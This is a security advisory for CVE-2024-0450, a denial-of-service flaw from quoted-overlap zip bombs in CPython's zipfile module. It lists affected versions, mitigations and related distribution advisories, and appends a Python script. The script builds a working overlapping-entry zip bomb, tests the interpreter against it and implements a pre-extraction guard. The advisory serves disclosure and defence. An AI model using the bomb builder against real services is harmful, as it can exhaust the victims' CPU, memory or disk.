PT-2023-9227 · Python · Cpython

Ee Durbin · Published 2023-09-25 · Updated 2025-08-11 · CVE-2024-0450

CVSS v3.1: 6.2 Medium
Vector: AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Name of the Vulnerable Software and Affected Versions: CPython versions 3.12.1, 3.11.7, 3.10.13, 3.9.18, and 3.8.18 and prior
Description: The CPython zipfile module is vulnerable to "quoted-overlap" zip bombs, which abuse the zip format so that many central-directory entries share (overlap) the same compressed data, giving the archive an extreme ratio of declared uncompressed size to on-disk size. Persuading a victim to open a crafted ZIP file with zipfile (read(), extract(), extractall() and testzip() all decompress entries) therefore causes a denial of service through CPU, memory or disk exhaustion. The fixed versions of CPython make zipfile reject archives whose entries overlap: opening such an entry raises zipfile.BadZipFile. The check covers overlap only; an archive whose entries do not overlap but still expand enormously is not rejected, so code that handles untrusted archives must still enforce its own size limits.
Recommendations: For versions 3.12.1, 3.11.7, 3.10.13, 3.9.18, and 3.8.18 and prior, update to a release that includes the zipfile fix; the distribution advisories listed under Related Identifiers track the backported packages. If updating is not immediately possible, do not open untrusted ZIP files with zipfile. Where that cannot be avoided, vet the archive from infolist() before extracting anything: reject it if any entry's compressed data extends past the next entry's local file header (or into the central directory), and cap both the total declared uncompressed size and its ratio to the archive size. Disabling or restricting the zipfile module itself is not a practical workaround, since it is part of the standard library and is used by other standard-library and third-party code.
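The script below is an added example and is not part of this advisory, of the PSF's publications or of CPython's own code or test suite. It builds a small quoted-overlap archive in memory in David Fifield's layout (each entry's DEFLATE stream opens with a stored block that quotes the next entry's local file header, so every entry decompresses into the same shared "kernel"), shows how the interpreter running it treats that archive, and implements the pre-extraction guard recommended above. Assumptions: the header layouts follow the ZIP application note; ZipFile.start_dir is an undocumented attribute holding the central-directory offset; the function names, the 64 KiB payload and the 26-entry count are constructed for the demonstration; the "Overlapped entries" message text is the one raised by fixed CPython releases.

```python
"""Added example, not from the advisory or from CPython: build a small
quoted-overlap zip bomb in memory, see how the running interpreter treats it,
and vet archives before extraction on releases that lack the fix."""
import io
import struct
import zipfile
import zlib

LOCAL_SIG = b"PK\x03\x04"
CDIR_SIG = b"PK\x01\x02"
EOCD_SIG = b"PK\x05\x06"


def _local_header(name: bytes, crc: int, csize: int, usize: int) -> bytes:
    # version needed, flags, method 8 (deflate), time, date, crc, sizes, name/extra lengths
    return LOCAL_SIG + struct.pack("<HHHHHIIIHH", 20, 0, 8, 0, 0,
                                   crc, csize, usize, len(name), 0) + name


def _central_header(name: bytes, crc: int, csize: int, usize: int, offset: int) -> bytes:
    return CDIR_SIG + struct.pack("<HHHHHHIIIHHHHHII", 20, 20, 0, 8, 0, 0, crc, csize,
                                  usize, len(name), 0, 0, 0, 0, 0, offset) + name


def build_quoted_overlap_zip(payload: bytes, n_entries: int) -> bytes:
    """One DEFLATE stream (the kernel) compressing `payload` is shared by every
    entry. Entry i's compressed data starts with a stored DEFLATE block whose
    literal bytes are entry i+1's local file header, so decompressing i emits that
    header as data and runs on through i+1's data into the same kernel.
    Entries get single-letter names, so n_entries is capped at 26."""
    assert 1 <= n_entries <= 26
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)       # raw deflate, as zip stores it
    stream, content = comp.compress(payload) + comp.flush(), payload
    entries = []                                          # (name, crc, csize, usize), last entry first
    for i in reversed(range(n_entries)):
        name = bytes([ord("a") + i])
        crc = zlib.crc32(content)
        entries.append((name, crc, len(stream), len(content)))
        lfh = _local_header(name, crc, len(stream), len(content))
        body = lfh + stream                               # the whole archive body once i == 0
        quote = b"\x00" + struct.pack("<HH", len(lfh), len(lfh) ^ 0xFFFF)  # stored block: LEN, NLEN
        stream, content = quote + lfh + stream, lfh + content  # what entry i-1 will decompress to
    entries.reverse()
    central, offset = b"", 0
    for name, crc, csize, usize in entries:
        central += _central_header(name, crc, csize, usize, offset)
        offset += 30 + len(name) + 5                      # next local header follows the 5-byte quote
    eocd = EOCD_SIG + struct.pack("<HHHHIIH", 0, 0, len(entries), len(entries),
                                  len(central), len(body), 0)
    return body + central + eocd


def declared_uncompressed(data: bytes) -> int:
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return sum(zi.file_size for zi in zf.infolist())


def stdlib_read(data: bytes, name: str):
    """Decompressed length of one entry, or the BadZipFile message if this
    interpreter refuses it (releases with the fix raise 'Overlapped entries')."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        try:
            return len(zf.read(name))
        except zipfile.BadZipFile as exc:
            return str(exc)


def vet_archive(data: bytes, max_ratio: int = 100) -> list:
    """Pre-extraction guard for releases without the fix. Applies the fix's rule
    (an entry's compressed bytes must end at or before the next local header, or
    the central directory) plus a declared-expansion ceiling the fix does not add.
    Returns a list of findings; empty means the archive passed."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = sorted(zf.infolist(), key=lambda zi: zi.header_offset)
        cd_start = zf.start_dir        # central directory offset (undocumented attribute)
    ends = [zi.header_offset for zi in infos[1:]] + [cd_start]
    for zi, end in zip(infos, ends):
        off = zi.header_offset
        hdr = data[off:off + 30]
        if len(hdr) < 30 or hdr[:4] != LOCAL_SIG:
            findings.append(f"bad local header: {zi.filename}")
            continue
        nlen, xlen = struct.unpack("<HH", hdr[26:30])   # lengths from the local header, not the CD
        if off + 30 + nlen + xlen + zi.compress_size > end:
            findings.append(f"overlap: {zi.filename}")
    declared = declared_uncompressed(data)
    if declared > max_ratio * len(data):
        findings.append(f"ratio: {declared} bytes declared by a {len(data)}-byte archive")
    return findings


def make_clean_zip() -> bytes:
    # Ordinary archive written by the stdlib, as a no-false-positive control.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("readme.txt", "hello world\n" * 200)
        zf.writestr("data.bin", bytes(range(256)) * 8)
    return buf.getvalue()


BOMB = build_quoted_overlap_zip(b"A" * 65536, 26)   # constructed: 26 entries, one 64 KiB kernel

if __name__ == "__main__":
    print(len(BOMB), "archive bytes declare", declared_uncompressed(BOMB), "uncompressed bytes")
    print("read 'a':", stdlib_read(BOMB, "a"), "| guard:", vet_archive(BOMB)[-2:], vet_archive(make_clean_zip()))
```

On a release with the fix, stdlib_read(BOMB, "a") returns the "Overlapped entries" message while the last entry "z" still reads normally (its data ends exactly at the central directory); on an unfixed release "a" decompresses to the 25 quoted headers plus the kernel. vet_archive flags every quoting entry on either release and also reports the expansion ratio, which is the check that remains the caller's job after patching.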

Fix

DoS

Improper Resource Release

Resource Exhaustion


Related Identifiers

ALSA-2024:3347
ALSA-2024:3466
ALSA-2024:4058
ALSA-2024:4078
ALSA-2024:4243
ALSA-2024:9190
ALSA-2024:9192
ALT-PU-2024-12993
ALT-PU-2024-14497
AZL-36894
AZL-42573
BDU:2024-04927
BIT-LIBPYTHON-2024-0450
BIT-PYTHON-2024-0450
BIT-PYTHON-MIN-2024-0450
CESA-2024_3347
CESA-2024_3466
CESA-2024_4058
CESA-2024_4243
CVE-2024-0450
DLA-3771-1
DLA-3772-1
DLA-3948-1
DLA-3980-1
INFSA-2024_3347
INFSA-2024_3466
INFSA-2024_4058
INFSA-2024_4078
INFSA-2024_4243
INFSA-2024_9190
INFSA-2024_9192
MGASA-2024-0096
OESA-2024-2141
OESA-2024-2190
OESA-2024-2191
OESA-2024-2193
OPENSUSE-SU-2024:13790-1
OPENSUSE-SU-2024:13794-1
OPENSUSE-SU-2024:13799-1
OPENSUSE-SU-2024:13800-1
OPENSUSE-SU-2024:13983-1
OPENSUSE-SU-2024_1162-1
OPENSUSE-SU-2024_1862-1
PSF-2024-2
RHSA-2024:3347
RHSA-2024:3391
RHSA-2024:3466
RHSA-2024:4058
RHSA-2024:4078
RHSA-2024:4243
RHSA-2024:4406
RHSA-2024:9190
RHSA-2024:9192
RHSA-2024_3347
RHSA-2024_3466
RHSA-2024_4058
RHSA-2024_4078
RHSA-2024_4243
RHSA-2024_9190
RHSA-2024_9192
RLSA-2024:3347
RLSA-2024:3466
RLSA-2024:4078
RLSA-2024:9190
RLSA-2024:9192
SUSE-SU-2024:1009-1
SUSE-SU-2024:1162-1
SUSE-SU-2024:1556-1
SUSE-SU-2024:1774-1
SUSE-SU-2024:1843-1
SUSE-SU-2024:1844-1
SUSE-SU-2024:1847-1
SUSE-SU-2024:1862-1
SUSE-SU-2024:2479-1
SUSE-SU-2024_1843-1
SUSE-SU-2024_1844-1
SUSE-SU-2025:20025-1
SUSE-SU-2025:20154-1
SUSE-SU-2025:20374-1
USN-6891-1
USN-7212-1

Affected Products

Alt Linux
Almalinux
Astra Linux
Cpython
Centos
Debian
Ibm Aix
Linuxmint
Red Hat
Red Os
Rocky Linux
Suse
Ubuntu
Zvirt Node